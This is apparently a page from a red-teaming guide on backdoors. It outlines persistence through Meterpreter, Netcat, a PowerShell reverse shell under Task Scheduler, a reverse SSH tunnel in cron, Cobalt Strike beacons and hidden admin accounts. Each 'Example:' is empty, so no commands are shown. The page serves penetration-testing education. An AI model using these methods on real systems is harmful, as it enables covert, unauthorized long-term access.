Backdoors
Practical Guide to Backdoors in Red Teaming
Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors.
Creating a Persistent Meterpreter Session
Tool: Metasploit
Steps:
Exploit a vulnerability to gain an initial foothold.
Migrate to a stable process to maintain the session.
Set up persistence with a Meterpreter script.
Once the session is established:
This command sets up a persistent Meterpreter backdoor that will start every time the user logs in.
Using Netcat for a Simple Backdoor
Tool: Netcat
Steps:
Transfer Netcat to the target system.
Set up a persistent listener on the target system.
Example:
To make it persistent, add the command to a startup script:
Using PowerShell for Windows Persistence
Tool: PowerShell
Steps:
Create a PowerShell script to establish a reverse shell.
Use Task Scheduler to run the script at startup.
Example:
Save this script and schedule it using Task Scheduler:
Creating a Reverse SSH Tunnel
Tool: SSH
Steps:
Set up a reverse SSH tunnel to maintain access.
Example:
To make it persistent, add the command to cron
:
Deploying Custom Backdoor with C2 Framework
Tool: Cobalt Strike
Steps:
Use Cobalt Strike to create a custom beacon.
Deploy the beacon on the target system and set it to call back periodically.
Example:
In Cobalt Strike:
Hidden User Accounts: Creating hidden user accounts with elevated privileges.
Example: Creating a Hidden Admin User on Windows:
Impact: The hidden user account provides the attacker with administrative access.
Some useful Backdoor references:
Last updated